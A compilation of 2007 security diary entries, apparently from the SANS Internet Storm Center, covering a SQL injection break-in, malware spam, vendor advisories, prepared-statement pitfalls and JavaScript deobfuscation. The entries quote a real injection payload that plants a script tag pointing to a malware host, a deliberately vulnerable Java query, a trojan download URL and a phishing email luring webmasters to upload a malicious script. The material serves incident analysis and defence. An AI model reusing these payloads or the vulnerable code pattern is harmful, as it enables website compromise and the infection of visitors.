Published: 2007-02-28

Super Bowl Infection - Analysis of One Break-in

A few weekends ago we posted a diary about several web sites that were infected by a one-line script pointer to sites containing hostile code.  The initial site that got everybody's attention belonged to the Dolphins Stadium, and that led us to finding several more that we listed in that diary.  Since then several of the system administrators of those sites have written back to us confirming that they had been targeted.  One system administrator provided us with some excellent analysis and feedback, and gave us permission to post it below.  I've cleaned his comments up a bit to remove any attribution.

Fyi, we do not use DreamWeaver.

What boggles my mind is how we got attacked and how the hackers successfully corrupted one SQL table record.

All Windows security patches were up-to-date.

There is no SQL patch for this, as far as I know, just lazy programming technique allowing untrusted text to be attached to SQL parameters (typical SQL injection).

I have found in our IS logs this attacker’s string occurring several times early in January:

2007-01-01 17:37:27 - GET /jobs/job.asp ID=1343;update%20main%20set%20postitle='<script%20src="http://bc0.cn/1.js"></script>';-- 200 0 309 125

This source IP is from CHINANET-ZJ Jinhua node network - descr: Zhejiang Telecom

And later on several of these:

2007-01-13 23:44:31 - GET /jobs/job.asp ID=1343;update%20main%20set%20postitle='<script%20src="http://bc0.cn/1.js"></script>';-- 200 0 389 47

The source IP translates (reverse) to:

OrgName: Managed Solutions Group, Inc. OrgID: MSG-48 Address: 46750 Fremont Blvd. Address: #107 City: Fremont StateProv: CA PostalCode: 94538 Country: US

The first part is an usual reply to a dynamic query, preprocessed by IIS and sent to client for the display.

It contains details (all fields from the db record, including a field named ‘postitle’).

The hacker then will try to corrupt the record by replacing the field content with the exploit ‘js’ script.

When then our visitor downloads this page, he/she executes this script and infect himself with this Trojan, right?

So the chance is very slim to get infected from us. You have to know WHICH record to retrieve.

I tried to replicate this attack but was unable to. The 2nd part of SQL never executed.

That’s what is puzzling.

Note that IIS records return code 200, which indicates a successful operation.

Mind you, just ONE record was corrupted like this (out of many hundreds – these happened to be job opening positions).

We now edit very carefully inputs fields in online forms, our developers updated DAO, Active-X and permission from webserver IIS to SQL server (different box). – i.e. SQL permissions on individual table levels.

This was clearly focused attack and we were targeted.

We are grateful for his analysis and willingness to share.  Remember that the last step in the six-step incident handling process is the Lessons Learned, and that sharing those lessons with others will help fellow system administrators learn from your experience.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-02-28

Something amiss on Yahoo! Mail?

We have received two separate reports of Symantec AV being triggered when accessing Yahoo! Mail today (w32.feebs).  Apparently the issue disappeared later during the day.

If you have any further information we would be glad to hear from you!

Thanks to Agris and William for bringing the matter to our attention.

Update:   Multiple users wrote in confirming the observation. Symantec now posted a message stating that this is a false positive and they are working on a singature update to fix the problem.


Published: 2007-02-27

Solaris worm?

We have received a report today from our friend Jose over at Arbor, pointing us to this article

Looks like a netrange over in France is scanning around for port 23.  Read the article for further details about the "worm".

We checked our data here at the Storm Center and it appears we have similar traffic from the same net ranges. 

High number of targets, but low number of sources also reflects that.  Check it out

Joel Esler

Update (Arrigo): as of 13:00 UTC the sources number 102 which is still rather low, one hopes that there aren't that many publicly reachable Solaris systems running telnet.


Published: 2007-02-26

It's 10 p.m. Do you know where your children are?

Some of you may or may not  remember that question.  It started in the 60s and was asked right before the nightly 10pm news.    Many parents are now very aware of the need to know where their children are and would answer without hesitation.  We have learned the importance of knowing where our children are and who they are with.  However, many times, parents fail to realize that even though their kids are physically at home, they may be socializing with others on the internet and the parents do not even know it.

Being a parent, one of my kids wanted to get one of the latest toys that seems to be the rage right now.  Some of you may or may not already have had the grand priviliage of buying one of these. They are called "Webkinz". You buy a pet that looks like a beanie baby and with this pet comes a code. When your child visits the Webkinz website, they register and the code lets them adopt their pet in a virtual world.   I had spoken to another mother about the them and she was telling me how great they were and how nice it was for her daughter to be able to be on the internet and in a safe environment.

So, I get my kids one of these new toys and I told them I wanted to check the site out first.  I register one of my kids and it asked me for a first name, birthdate, city and state.  Then it asks for a username (and reminds kids NOT to use their real name).  It also asks that kids under 9 have an adult help them.  Now I'm in Webkinz world.  Your child has to take care of their pet and earn "Webkinz cash" to do this.   I explored the site in detail.  I did find one area that disturbed me.  My 6 year old knew the feature was there and was looking for it.  There is a "phone" on the website that you can power on.  This phone is a special chat utility that lists your friends and allows you to talk with them.  That bothered me, so I started looking at it closer.  With the phone, you can add your friends if you know their user name.  Not too bad at this point.  Then I decided to play in the "tournament arena" area.  You wait till an opponent has been found and then you are ready to play.  My child is 6 and I'm not a terrible game player, but I got killed at this particular mindless game.  Immediately after losing a request appeared from the person I was playing asking to be added to my child's "friends" list.    After some research, I found the chats are restricted on what can be entered in them and this one appears to be well thought out. 

My thoughts immediately went back to my friend who thought her daughter was on a "safe" site.  When I asked her about the chat capability, she had NO idea it was there.  She had logged on with her child, but did not know the extent of the website and its capabilities.  As parents, we can no longer assume something is safe on the internet.  Our kids are taught to never talk to a stranger in person, but most of them don't see the harm via the internet.  In this case, the parent didn't even realize it was a possibility.  It took me a full day to explore all the options on this website.

Please understand, that I am NOT bashing Webkinz.  My kids love the site, but now they have limits.  I have their user names and passwords and I can log on and check if they have added any "friends".  They are not allowed to do so without permission.  They are also not allowed to chat with any users they do not know nor accept any invitation to be added to a "friends" list. 

Times have really changed and instead of just having to worrying about where your kids are physically and who they are talking to, parents now have to be concerned about where they are in cyber world and who they are talking to.  We can't afford to make the assumption the sites they are visiting are safe.   The internet never closes.  Maybe the original question needs to be modified to say:  "Its 10 P.M.  Do you know where your children are both physically and on the internet?"


Published: 2007-02-26


What happens when an adept of the dark side of the force looks at the documentation on javascript's onUnload() function ?

Take a look for yourself and come back, we won't go anywhere:
So something that gets called no matter how the user tries to get away from a web page. Imagine what pages you might want to get away from ...

As the MSDN article says, adding a window.open() call in such a routine becomes a nightmare for the visitor as (s)he'll never manage to get away on his/her own. Pop-up blockers should -if all goes right- detect and prevent that one case. But it gets worse, how about "location = self.location;" ? Right, the visitor doesn't go away at all.

Is there anything new to this? Not as such, it's been known for years and was e.g. discussed in August of 2005 on full disclosure mailing lists.

One would assume open discussion of such a function where it's being labeled as potentially evil would cause security conscious developers to take note of such a dangerous function and severely limit it's possibilities, or better yet to get rid of it altogether.

Yet there seems to have been no such luck. Worse, there seems to have been renewed attention form those using the dark side as evidenced by these recent reactions:

MSIE 7: CVE-2007-1091 (mitre) or CVE-2007-1091 (nist)
"Microsoft Internet Explorer 7 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via onUnload Javascript handlers. "
Firefox: US-CERT Vulnerability Note VU#393921
"Mozilla Firefox fails to properly handle JavaScript onUnload events. Specifically, Firefox may not correctly handle freed data structures modified in the onUnload event handler possibly leading to memory corruption. By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user.

Personally I've a hard time to see how supporting onUnload() matches with statements such as:
"Put safety first.
Robust new Internet Explorer 7 architecture and improved security features help protect you against malicious software, and help to keep your personal data safe from fraudulent websites and online phishing scams." (taken from http://www.microsoft.com/windows/products/winfamily/ie/default.mspx )
I'm sure Firefox will have a "security is important" statement just as well, but I didn't find it yet.

Best course of action: disable scripting, but most of you can't or don't want to do that. The second best alternative might be to use extensions such as NoScript in Firefox that allows more selective control of who gets to do remote code execution in your browser. Yes that's what allowing java, VBscript and javascript basically is: allowing random websites to hand your browser code to execute ...

Swa Frantzen -- NET2S


Published: 2007-02-24

Kernel malware paper from F-Secure

Kimmo Kasslin from F-Secure has released a paper on Kernel malware. In the paper, a brief overview of kernel malware is provided followed by detailed analysis of the kernel malware and case studies. If you ever wonder how kernel rootkit and other kernel level malware works, this is a good paper to read.

Follow this link to the paper. Together with the paper, Kimmo's slides for AVAR 2006 conference talk on the same topic is also released.


Published: 2007-02-24

SupportSoft Active X fixed

SupportSoft's ActiveX control that allows a.o. remote assistance has been update fixing a security issue leading to remote code execution.

Vendor info
CERT coordination

Security products affected:
But do note there are many more sources for these controls to sneak in through.

As for workarounds, consider disabling ActiveX and/or the list of killbits:

Swa Frantzen -- NET2S


Published: 2007-02-24

Prepared Statements and SQL injections

In the previous few days, I had numerous discussion with different people about the use of prepared statements to mitigate SQL injection vulnerabilities. Prepared statements definitely works well as part of the mitigation strategy for SQL injection if implemented properly. I still remember 4-5 years ago when SQL injection just started to become popular, the common mitigation suggested is to use prepared statement as if it is a magic bullet. As we understand the SQL injection problem better, we realize that even prepared statement can be vulnerable to SQL injection as well.

The fundamental problem in SQL injection is concatenation of untrusted data (raw user input) to trusted data and the whole strings is being sent to the backend database for execution. The moment you merge the raw untrusted data to other trusted data for execution, you got a problem.

Look at this prepared statement (Java)

PreparedStatement Stment = con.prepareStatement("SELECT * FROM table WHERE cond = ' + UserInput + ' ");

The UserInput which is raw input from the user is concatenated with the other string to form SQL statement then it is "prepared" for execution in the database. What's wrong here?  Untrusted data is concatenated with static strings and sent to database to execution, no validation whatsoever.... BOOM... SQL injection for ya.

Let's look at another version of this statement

Stment = "SELECT * FROM table WHERE cond = ? ";
PreparedStatement prepSQL = con.prepareStatement(Stment);
prepSQL.setString (1, UserInput);
ResultSet rs = prepSQL.executeQuery();

See the question mark in the first line? That's the character to tell prepared statement mechanism that there are more data coming into this space. Think "fill in the blanks" exercise here, question mark is an empty spot for filling, the setString function just fill a string into that spot. When statement is prepared, validation is performed on the user input, in the case of Java, the JDBC driver escapes the user input properly. Untrusted user input go through validation and become validated input. This type of passing user input to the statement as a parameter is sometimes referred to as parameterized queries.

One risk still remains here.... The implementation of the database driver (or data access mechanism) has to accurately escape the potentially offensive user input. So far, the track record of such mechanism across multiple languages are pretty good.

Extra note here about stored procedures which was regarded as another potential mitigations for SQL injection as well; Both prepared statement and stored procedures can be vulnerable to SQL injection if it is not done properly. Similar to prepared statement, stored procedure can be done in parameterized form to mitigate SQL injection.

Shameless plug - To get more info on web related security issues, SANS offers SEC 519 course on web application security.


Published: 2007-02-23

Firefox released

The Mozilla folks have released the long-awaited version of Firefox.  The second link below shows that 7 security issues were fixed.  One rate critical.

Release Notes: http://www.mozilla.com/en-US/firefox/
Security Issues: http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.2


Published: 2007-02-23

Botnet with reference to SANS

In a lot of the malware that comes across ISC, the author leave in some kind of signature or message. This week, we have received report of a botnet malware with reference to SANS (hidden in the code), the message is similar to the following,

You better f##k off SANS.org especially that Johannes Ullrich (jullrich@XXX, XXX-XXX-XXXX) and Kevin Hong (khong@XXX.kr, +XX-X-XX-XXX). I really don't have anything against you, just p##s off alright?

The author of the malware also registered 'sans-security.org' (now defunct)

The binary is a Vanbot variant.  At the time of writing, Virustotal has the following to say about the malware.

Antivirus Version Update Result
AntiVir 02.22.2007 BDS/VanBot.AY.6
Authentium 4.93.8 02.23.2007 W32/Trojan.YAZ
Avast 4.7.936.0 02.22.2007 no virus found
AVG 386 02.23.2007 BackDoor.Generic5.CLH
BitDefender 7.2 02.23.2007 no virus found
CAT-QuickHeal 9.00 02.22.2007 Backdoor.VanBot.ay
ClamAV devel-20060426 02.22.2007 no virus found
DrWeb 4.33 02.23.2007 BackDoor.IRC.Sdbot.1125
eSafe 02.23.2007 Win32.VanBot.ay
eTrust-Vet 30.4.3423 02.23.2007 Win32/Nirbot.K
Ewido 4.0 02.22.2007 Backdoor.IRCBot.aab
FileAdvisor 1 02.23.2007 no virus found
Fortinet 02.23.2007 W32/SDBot.H!worm
F-Prot 02.22.2007 W32/Trojan.YAZ
F-Secure 6.70.13030.0 02.23.2007 Backdoor.Win32.VanBot.ay
Ikarus T3.1.0.31 02.22.2007 Backdoor.Win32.VanBot.ay
Kaspersky 02.23.2007 Backdoor.Win32.VanBot.ay
McAfee 4969 02.22.2007 W32/Sdbot.worm.gen.h
Microsoft 1.2204 02.23.2007 no virus found
NOD32v2 2076 02.22.2007 Win32/Vanbot.AY
Norman 5.80.02 02.22.2007 no virus found
Panda 02.23.2007 W32/Sdbot.JWH.worm
Prevx1 V2 02.23.2007 Malware.Trojan.Backdoor.Gen
Sophos 4.14.0 02.21.2007 no virus found
Sunbelt 2.2.907.0 02.22.2007 no virus found
Symantec 10 02.23.2007 W32.Rinbot.B
TheHacker 02.21.2007 no virus found
UNA 1.83 02.22.2007 Backdoor.VanBot.E9CE
VBA32 3.11.2 02.22.2007 Backdoor.Win32.VanBot.ay
VirusBuster 4.3.19:9 02.22.2007 no virus found


Published: 2007-02-23

Reminder of our emergency URL

Just like any security minded organization, ISC have done our own emergency preparedness work. In situations where our main website cannot be accessed, we will be turning to alternative location (separate hosting location), iscems.dshield.org/index.txt 

We suggest you keep this page bookmarked and keep it handy just in case if anything ever happens. If we ever need to broadcast message from our alternative site, the messages would be PGP signed.

Let's hope we never need to use the alternative site...... But we are never really sure.


Published: 2007-02-21

New NIST documents released

The NIST (National Institute of Standards and Technology ) released yesterday 3 new documents:

1. SP 800-45 Version 2, Guidelines on Electronic Mail Security
2. SP 800-94, Guide to Intrusion Detection and Prevention Systems (IDPS)
3. SP 800-97, Establishing Wireless Robust Security Networks: A Guide to IEEE 802.11i

I was just reading the 3 and they are very good. I really liked the IDPS document, with great updates since the Intrusion Detection System document, explaining the concepts, with good real world examples.

It was interesting to see how the documents complement each other. The E-mail document has good references to IDPS, which also include good information regarding WLAN...really nice and I recommend you to take a look at least on the Table of contents. I am sure you will continue the reading...!:)


Published: 2007-02-19

German spam with malware link

We've received a report that a spam is making the rounds, it's in German, has the Subject "Fand ich Sie zufallig!". According to the automated malware analysis we received from Sven Marten, at the link in the email one obtains 2 pieces of malware, the first of which has sporadic AV detection at the moment. The second looks to be a Riler variant. Thanks Sven! His email to us says;

"The attached file contains an email that has been spammed into my mailbox >100 times this evening, so it aroused my interest. if one wgets the link in it one finds fotoalbum.exe which virustotal identifies as


Complete scanning result of "fotoalbum.exe", received in VirusTotal at 02.19.2007, 23:56:16 (CET).

Antivirus Version Update Result
AntiVir 02.19.2007 HEUR/Crypted
Authentium 4.93.8 02.19.2007 W32/Downloader.gen10
Avast 4.7.936.0 02.19.2007 no virus found
AVG 386 02.19.2007 no virus found
BitDefender 7.2 02.19.2007 DeepScan:Generic.Malware.dld!!.7F0C2515
CAT-QuickHeal 9.00 02.19.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.19.2007 no virus found
DrWeb 4.33 02.19.2007 no virus found
eSafe 02.19.2007 no virus found
eTrust-Vet 30.4.3412 02.19.2007 no virus found
Ewido 4.0 02.19.2007 no virus found
FileAdvisor 1 02.20.2007 no virus found
Fortinet 02.19.2007 suspicious
F-Prot 02.19.2007 W32/Downloader.gen10
F-Secure 6.70.13030.0 02.19.2007 Trojan-Downloader.Win32.Tiny.ft
Ikarus T3.1.0.31 02.19.2007 Win32.SuspectCrc
Kaspersky 02.19.2007 Trojan-Downloader.Win32.Tiny.ft
McAfee 4966 02.19.2007 no virus found
Microsoft 1.2204 02.19.2007 no virus found
NOD32v2 2070 02.19.2007 Win32/TrojanDownloader.Tiny.NCF
Norman 5.80.02 02.19.2007 W32/Downloader
Panda 02.19.2007 Suspicious file
Prevx1 V2 02.20.2007 no virus found
Sophos 4.14.0 02.19.2007 no virus found
Sunbelt 2.2.907.0 02.17.2007 no virus found
Symantec 10 02.19.2007 no virus found
TheHacker 02.19.2007 no virus found
UNA 1.83 02.19.2007 no virus found
VBA32 3.11.2 02.19.2007 suspected of Win32.Trojan.Downloader (http://...)
VirusBuster 4.3.19:9 02.19.2007 no virus found

Aditional Information
File size: 2108 bytes
MD5: 4b86679ded1718aac5f5bc4840da3e75
SHA1: f42d7eb0934388d65364d212735aae65db26cd5e

norman sandbox: [ General information ]
* File length: 2108 bytes.

[ Changes to filesystem ]
* Creates file C:WINDOWSTEMPzc2.exe.
[ Network services ]


* Downloads file from http://win20all.com/ar/zc2.exe as C:WINDOWSTEMPzc2.exe.
* Connects to "win20all.com" on port 80 (TCP).
* Opens URL: win20all.com/ar/zc2.exe.

[ Security issues ]

* Starting downloaded file - potential security problem.


and if one now takes a look at .... zc2.exe it gives us this littly nicety:


Complete scanning result of "zc2.exe", received in VirusTotal at 02.20.2007, 00:09:26 (CET).

Antivirus Version Update Result
AntiVir 02.19.2007 TR/Cimuz.B
Authentium 4.93.8 02.19.2007 W32/Cimuz.gen1@dr
Avast 4.7.936.0 02.19.2007 Win32:Agent-ENM
AVG 386 02.19.2007 Proxy.KMB
BitDefender 7.2 02.19.2007 Trojan.Cimuz.J
CAT-QuickHeal 9.00 02.19.2007 no virus found
ClamAV devel-20060426 02.19.2007 no virus found
DrWeb 4.33 02.19.2007 no virus found
eSafe 02.19.2007 Win32.Agent.ly
eTrust-Vet 30.4.3412 02.19.2007 Win32/Difisim!generic
Ewido 4.0 02.19.2007 Proxy.Agent.ly
FileAdvisor 1 02.20.2007 no virus found
Fortinet 02.19.2007 W32/Cimuz.BP!tr
F-Prot 02.19.2007 W32/Cimuz.gen1@dr
F-Secure 6.70.13030.0 02.19.2007 Trojan-Proxy.Win32.Agent.ly
Ikarus T3.1.0.31 02.19.2007 Trojan-Proxy.Win32.Agent.ly
Kaspersky 02.19.2007 Trojan-Proxy.Win32.Agent.ly
McAfee 4966 02.19.2007 Proxy-Agent.o
Microsoft 1.2204 02.19.2007 no virus found
NOD32v2 2070 02.19.2007 Win32/TrojanProxy.Cimuz.NAF
Norman 5.80.02 02.19.2007 W32/Agent.BBAA
Panda 02.19.2007 Trj/Cimuz.CZ
Prevx1 V2 02.20.2007 Malicious
Sophos 4.14.0 02.19.2007 Troj/Cimuz-BP
Sunbelt 2.2.907.0 02.17.2007 no virus found
Symantec 10 02.20.2007 Trojan.Riler.F
TheHacker 02.19.2007 Trojan/Proxy.Agent.ly
UNA 1.83 02.19.2007 TrojanProxy.Win32.Agent.694F
VBA32 3.11.2 02.19.2007 Trojan-Proxy.Win32.Agent.ly
VirusBuster 4.3.19:9 02.19.2007 Trojan.PR.Agent.SCN

Aditional Information
File size: 69632 bytes
MD5: d4862ca3b6f481141a2f3375ee237c81
SHA1: 97fc4d68b2432a2d0e7dd7750b67f3e4b0d9c166
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=0bc376578083


Published: 2007-02-19

Sourcefire addresses Snort vulnerability

The Sourcefire Vulnerability Research Team (VRT) today announced a vulnerability found in the DCE/RPC preprocessor in Snort and Sourcefire Intrusion Sensors.  The DCE/RPC preprocessor is vulnerable to a stack-based buffer overflow that could potentially allow an attacker to execute code with the same privileges as the Snort binary.
There are no publicly available exploits for this vulnerability at this time.
Mitigation for Snort:  If, for some reason, you can’t upgrade your version of Snort to v2.6.1.3, you can turn off the DCE/RPC preprocessor in your snort.conf file by commenting it out and restarting Snort.  Upgrading to the new version of Snort is highly recommended as soon as possible.  The new version of Snort is available here.
Your snort.conf will have an entry like:
preprocessor dcerpc: \
    autodetect \
    max_frag_size 3000 \
    memcap 100000
Just comment out these lines like:
#preprocessor dcerpc: \
#    autodetect \
#   max_frag_size 3000 \
#    memcap 100000
and restart Snort.  Then upgrade to v2.6.1.3.
If you have a Sourcefire Intrusion Sensor, Sourcefire released SEU 64 today that patches this vulnerability, and this update can be downloaded from the Sourcefire Customer Support Web Site.  After downloading and installing SEU 64, you will need to re-push your policies out from your Defense Center.
Mitigation for Sourcefire customers:  If, for some reason, you can’t update your SEU, edit your policies, uncheck the DCE/RPC “Enabled” check box, and re-push your policy until you can upgrade.
This vulnerability has been identified as CVE-2006-5276.
Joel Esler
(Yes, I am a Sourcefire employee)


Published: 2007-02-19

WHOIS contact spam with malicious security maintenance script attachment

We received a report from Hugh Brower that there is a spammed email destined for whois contacts that contains a malicious php attachment. The email is spoofed to look like it's from the domain's hosting provider. The email attempts to trick the recipient into executing the attachment. Currently the attachment information is;

Attachment Name webguard.php
File size: 130990 bytes
MD5: 1071956063131f0fd178ace92ab526bb
SHA1: c47dd28e336030e3d940b66e2884aba91124a831

The email says;

"Subject: Hosting Regular Security Maintenance

Dear yourdomainhost valued Members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file "webguard.php" in:

"./public_html" or (for Windows Based servers) in: "./wwwroot" in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux or Windows based websites that use PHP/CGI/PERL/ASP:

1) Download the attachment named "webguard.php"

2) Login to your site Control panel.

3) Open "File Manager" window.

4) Go through "Public_html" or "htdocs" (for UNIX/Linux Based servers),

but for Windows Based server, please Go through "wwwroot" directory.

5) Choose "Upload Files"

6) Upload the file "webguard.php"

7) Check its URL too "http://www.yoursite.com/webguard.php", if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards"

The attack has targeted more than one domain but does not appear to be widespread at the moment. Additional details will be posted as they develop.

Thanks Hugh!


Published: 2007-02-19

Oz PM health alert spammed with links to exploit

We've received a report of a spammed email with a hyperlink that ultimately attempts to install malware. The email is targeting Austrailians, the email references a heart attack that the Prime Minister has suffered, of course no such heart attack has occurred.

The email tells the reader to go to Australia's "The Australian - keeping the nation informed" website but the link is not for the real "The Australian" website. The bogus link is to austr-news.c_oh_m.

Thanks for the report Eric!


Published: 2007-02-17

The missing Microsoft patches updated

We've received information from Microsoft indicating how they are planning to deal with some of the vulnerabilities we are tracking in the missing Microsoft patches diary. The table is updated with our interpretation of how and when to expect a fix for the different issues. Note that it are expectations only, anything can change.

With many thanks to the folks in Redmond.

Swa Frantzen -- NET2S


Published: 2007-02-17

Javascript decoding round-up

In the recent past, we've shown several methods on how to unravel obstinate JavaScript codes used to convey exploits. Here's a brief round-up of the methods we commonly use. All four methods require that you get a copy of the hostile page, preferably by use of a text-only HTML tool like wget, curl or similar (since you cannot easily download a Javascript exploit with a browser that speaks Javascript without also running the Javascript code at the same time).

The Lazy Method
Edit your copy of the hostile HTML so that it only contains the necessary HTML headers and the Javascript you're interested in. Then hunt down all occurences of "document.write" and "eval" inside the Javascript and replace them with "alert". Copy the modified file onto a web server of yours, or to some other place from where you can easily open it with a web browser, which should make the decoded JavaScript appear inside one (or several) pop-up "alert" windows.

Pro: Quick and easy to accomplish
Con: Usually only decodes one (the first) encoding stage. Don't be disappointed if you get the next level of gibberish in your alert pop-up.

The Tom Liston Method
As explained eg. in https://isc2.sans.org/diary.html?storyid=1917. In your copy of the hostile page, hunt down all the "eval(txt)" and "document.write(txt)" function calls, and replace them with document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); Then again put the modified HTML onto some place from where you can open it with a web browser. The decoded JavaScript will show up inside a textarea panel.

Pro: Quick and easy to accomplish, and in case the textarea reveals another stage of encoded Javascript, this method allows for easy cut-and-paste to continue the decoding.
Con: Careful with typos. If you have a typo in the leading textarea definition, the following "document.write(txt)" will go right to the browser, as it originally would have, and the exploit will execute.

The Perl-Fu Method
Try to make sense of the Javascript decoding routine, and then re-create it with a short code block in PERL.

Pro: Very easy and fast for use on the dumber encoding methods like XOR, cesarean ciphers (character permutations), etc. Also the "safest" method, as this approach alone does not actually execute the hostile code.
Con: You have to speak Perl and be able to translate the Javascript decoding into Perl. Much too tedious an approach for very convoluted Javascript, or JavaScript codes using functions which are hard to translate into Perl (like the arguments.callee codes seen frequently in fall 2006)

The Monkey Wrench Method
Use the stand-alone Javascript interpreter "SpiderMonkey"  to run the encoded Javascript block. Replace the document.write(txt) with print(txt) before doing so, SpiderMonkey doesn't have any document object by default.

Pro: Little hassle, good results, fast method to get around a hard "outer shell" of a Javascript block encoded multiple times, works well in combination with the Perl-Fu method.
Con: Fails for Javascript code deliberately written to only uncompress on Internet Explorer.

Caveat: For the first two methods mentioned, be mindful that you are actually running hostile code inside a potentially vulnerable web browser. Make sure to apply the usual precautions (VMWare or the like, deployed far away from any production network you might have, and keeping a keen eye on the firewall log, etc).

...and before you write in to ask: Yes, concrete examples on how to use the four methods above will follow later today :)


Published: 2007-02-16

Funky Apple Updates after 2007-0002

/** I am an Apple fanboy, so I am not picking on Apple **/

That being said, it seems we have found a buggy little feature of OSX after installing Security Update 2007-0002.

It asks us to reinstall Security Update 2007-0001 and iTunes/Quicktime update of 7.0.2.

Now, we have been testing this on many OSX Machines, it appears to be isolated to:

  • PPC Arch Only (We haven't been able to reproduce on Intel based machines)
  • 10.4.8 (We can't reproduce on 10.3, only 10.4) and
  • Those machines that are patched to 2007-0001 level

We are actually testing one machine right now that is a fresh build from CD, upgraded a month ago to 10.4.8, and that machine is having many problems even getting to the point where it is able to download Security Update 2007-0001, let alone version 0002.
  • It had problems with Installing the latest Java update but succeeded after a second try
  • It cannot complete the download of iTunes+Quicktime 7.0.2 (download freaks out halfway)
  • It does download Security Update 2007-0001, but fails to install it 
  • It never was allowed to download Security Update 2007-0002 so far
The /var/log/install.log file looks like this:
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: Distribution: iTunes + QuickTime
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: Distribution: Security Update 2007-001
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: JavaScript error "Value undefined (result of expression system.ASUEnumerateProducts) is not object." while running "__choice_su_visible"
/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: __choice_su_visible returned error: Value undefined (result of expression system.ASUEnumerateProducts) is not object./System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: JavaScript error "Value undefined (result of expression system.RegistryQueryStringValue) is not object." while running "__choice_su_visible"/System/Library/CoreServices/Software Update.app/Contents/MacOS/Software Update: __choice_su_visible returned error: Value undefined (result of expression system.RegistryQueryStringValue) is not object.admin auth received to install


As of this time we have filed a bug with Apple, if you have any comments, can reproduce the error, can't reproduce the error (CHECK YOUR VERSIONS), please write in.

Joel Esler


Published: 2007-02-16

New Challenge - Charlotte's Web Site

Salutations, challenge fans!  I just posted a new challenge to test your skills over at Ethical Hacker dot Net.  This time around, I've weaved a web for you to untangle, set in the after-story of Charlotte's Web.  This book is one of my favorites and features a spider named Charlotte who has to save Wilbur the pig by building spider webs with words like "Terrific" and "Some Pig" in them.  In my challenge, you'll get to match wits with Lurvy, the farm hand, and decipher Charlotte's new plan to save Wilbur.  Answers are due by March 16, 2007.  Access the challenge here.

--Ed Skoudis
SANS Instructor
Handler, Internet Storm Center


Published: 2007-02-16

SpamAssassin Release version 3.1.8

Looks like a new version of SpamAssassin (SA) came out yesterday, version 3.1.8.  Take a look at the advisory here

This loks like a maintenance AND security release.  It patches CVE-2007-0451, a "possible DoS due to incredibly
  long URIs found in the message content"

Time to patch!

Joel Esler


Published: 2007-02-15

Apple Security updates released

Apple released a security update today for users of Mac OS X v10.3.9 and v10.4.8 (including OS X Server):

  • Mounting a maliciously-crafted disk image could lead to a crash or arbitrary code execution (CVE-2007-0197)
  • Attackers on the local network can cause iChat to crash. A proof of concept was published in January (CVE-2007-0614 and CVE-2007-0710)
  • By using iChat AIM to visit a maliciously crafted URL an attacker could trigger an overflow, leading to a crash of the application or arbitrary code execution.
  • The UserNotificationCenter runs with elevated privileges in a local user context. This update forces the application to drop its group privileges shortly after starting. While this does not fix a directly exploitable vulnerability in itself, it fortifies the overall security posture of the application.

Security Update 2007-002, which contains these fixes, can be downloaded at Apple Downloads. Also have a look at these Java and DST updates.



Published: 2007-02-15

Clamav security vulnerabilities

The Clamav development team released version 0.90 of their open-source antivirus toolkit today. This version contains fixes for security vulnerabilities described in a number of iDefense advisories that were simultaneously published.

ClamAV CAB File Denial of Service Vulnerability (CVE-2007-0898)
Remote attackers can perform a service degradation attack by sending a malformed CAB file through a gateway scanner running ClamAV. The vulnerability can prevent ClamAV from scanning archives succesfully by depleting the available local file descriptors. iDefense investigated a number of common setups and observed that in most cases, mails that cannot be scanned will be auto-denied.

ClamAV MIME Parsing Directory Traversal Vulnerability (CVE-2007-0897)
An input validation bug allows a remote user to overwrite files on the system that are owned by the clamd scanner. A potential target mentioned in the advisory is the virus database. By overwriting this file, the scanner's effectiveness against certain threats can be reduced significantly.

Both vulnerabilities were resolved in ClamAV's new stable 0.90 release. Do note that users that automatically download and install signature updates are not automatically covered. When vulnerabilities in anti virus software are addressed, it is important to understand whether they are fixed in the signatures or scanning engines. Depending on the solution in use, most setups are configured to automatically update the former, while the latter may require separate upgrades.



Published: 2007-02-14

Going Mobile

Earlier today, Symantec released a security advisory detailing a vulnerability in how Palm OS Treo smartphones allow users to access data. Users with physical access to the device are able to use the Find feature to locate data, even when the device is locked. As a fix has not yet been released, Symantec advises to notify users so they are aware of this weakness and can take other actions to prevent disclosure of sensitive data.

Virtually all of your organizations are currently supporting the use of mobile devices in one way, shape or form. That these may impact the organization's security posture has been proven by new threats such as cell phone viruses (Commwarrior, Cabir) and Bluetooth hacking. These examples show that an understanding of wireless technology needs to be built into all security capabilities within the organisation; not just into policy statements, but also in their respective translation into procedures, guidelines and the supporting awareness programs.

If you're looking for inspiration, have a look here:

Australia's DSD government policy on Blackberry security
DRAFT NIST Guidelines on Cell Phone Forensics

Any other good examples you know of ? Drop us a message.

Maarten Van Horenbeeck


Published: 2007-02-14

Cisco ASA, Pix, and FWSM Vulnerabilities

The Valentine's presents keep coming!  Cisco released some pretty interesting advisories today.  Patches are available, and you should definitely check them out if you are a Cisco shop.

Cisco PIX and ASA, Advisory ID: cisco-sa-20070214-pix
Cisco Firewall Services Module, Advisory ID: cisco-sa-20070214-fwsm

Flaws can lead to denial of service, reloading of images in the device, and possible admission of unwanted traffic through ACLs.


Published: 2007-02-14

Finding Files and Counting Lines at the Windows Command Prompt

Yesterday, Microsoft delivered to us a bouquet of a dozen patches, just in time for our Valentine’s Day celebration today.  With those patches, and a recent inundation of other vulnerabilities (Solaris Telnet?  Are you kidding me?), I’d like do a quick change of pace to give you a couple of fun tips for using the Windows command line.

